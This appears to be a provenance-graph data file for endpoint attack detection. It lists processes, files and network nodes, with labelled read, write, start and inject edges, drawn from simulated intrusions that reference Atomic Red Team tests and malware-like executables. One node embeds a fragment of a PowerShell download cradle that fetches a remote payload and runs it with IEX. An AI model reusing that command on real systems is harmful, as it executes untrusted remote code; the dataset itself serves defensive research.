20
MP*-863e7c22c771e4005197ae28363584f8.exe 2620
MP-OneDrive.exe 
MP-ServiceModelReg.exe
SO-https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/msxslxmlfile.xml
MP-firefox.exe 
MF-C:\Windows\System32\runas.exe
MF-\Users\admin\AppData\Local\Temp\Protected.exe
SF-C:\Users\admin\AppData\Roaming\XClient.exe
MP*-WScript.exe
SF-C:\Users\admin\Desktop\7d93b142ab6fca16c0be4c3720a50833.exe
MP*-where.exe
MP-lsass.exe
SO-https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt','Default_File_Path.ps1');IEX((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_
MF-PathToAtomicsFolder\T1218.011\src\index.hta
MF-C:\Users\admin\Desktop\Запрос
TP*-danke.exe 
MP-C:\Program Files\Common Files\Adobe\ARM\1.0\AdobeARM.exe
SF-C:\Users\Public\Music\mediatv
SO-192.168.5.25
TP-FACTURA COMERCIAL_70051.pdf.exe
46
0 1 FR
0 2 FR
1 2 UK
3 0 RF
0 4 FR
3 4 RF
0 5 WR
4 5 UK
0 6 RD
0 7 WR
0 8 FR
8 3 ST
8 6 WR
8 7 RD
0 9 RD
8 9 WR
0 10 FR
10 3 ST
10 6 WR
10 7 WR
8 10 UK
3 11 RF
11 6 WR
11 7 RD
11 9 WR
12 11 RF
11 13 RD
11 14 RD
15 6 WR
15 7 WR
15 9 RD
11 15 IJ
15 12 ST
15 13 RD
15 14 RD
16 6 CD
16 7 WR
16 9 WR
11 16 UK
15 17 RD
18 15 RF
19 9 RD
12 19 RF
19 13 WR
19 14 WR
15 19 UK

